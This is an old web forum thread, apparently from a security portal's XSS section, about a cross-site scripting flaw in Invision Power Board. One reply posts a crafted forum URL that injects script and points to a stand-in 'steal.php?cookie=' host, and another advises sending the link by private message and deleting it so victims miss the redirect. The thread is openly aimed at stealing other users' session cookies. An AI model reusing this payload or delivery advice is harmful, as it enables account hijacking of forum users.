|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 178
Members: 0
Total: 178
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
new xss in Invision Power Board |
|
Posted: Sat Jul 09, 2005 11:10 pm |
|
|
any2000 |
Active user |
|
|
Joined: Dec 02, 2004 |
Posts: 26 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Wed Aug 03, 2005 12:41 am |
|
|
Matt |
Regular user |
|
|
Joined: Jul 30, 2005 |
Posts: 7 |
|
|
|
|
|
|
|
all that script does is show your own cookie.
for it to work you'd need to get someone else's cookie. |
|
|
|
|
Posted: Fri Aug 05, 2005 1:26 pm |
|
|
sygma |
Regular user |
|
|
Joined: Nov 21, 2004 |
Posts: 7 |
|
|
|
|
|
|
|
[code]www.xxx.com/forums/index.php?act=idx='>http://www.xxx.com/steal.php?cookie=[/color]<script>alert(document.cookie)</script>
better? |
|
_________________ [i]no word to save thee[/i] |
|
|
|
Posted: Tue Sep 20, 2005 1:48 pm |
|
|
super |
Active user |
|
|
Joined: Sep 19, 2005 |
Posts: 30 |
|
|
|
|
|
|
|
where I put this? in URL bar? |
|
|
|
|
Posted: Tue Sep 20, 2005 5:10 pm |
|
|
marlboro3 |
Beginner |
|
|
Joined: Sep 11, 2005 |
Posts: 2 |
|
|
|
|
|
|
|
No
Well the best working is private message. One way to not afraid the reader of the redirection is to redirect in his message window and delete the crafted message.
Works 100%, some don't even notice redir. |
|
|
|
|
Posted: Tue Sep 20, 2005 7:57 pm |
|
|
super |
Active user |
|
|
Joined: Sep 19, 2005 |
Posts: 30 |
|
|
|
|
|
|
|
I don't understand clearly please reply with detaile pleaseee |
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|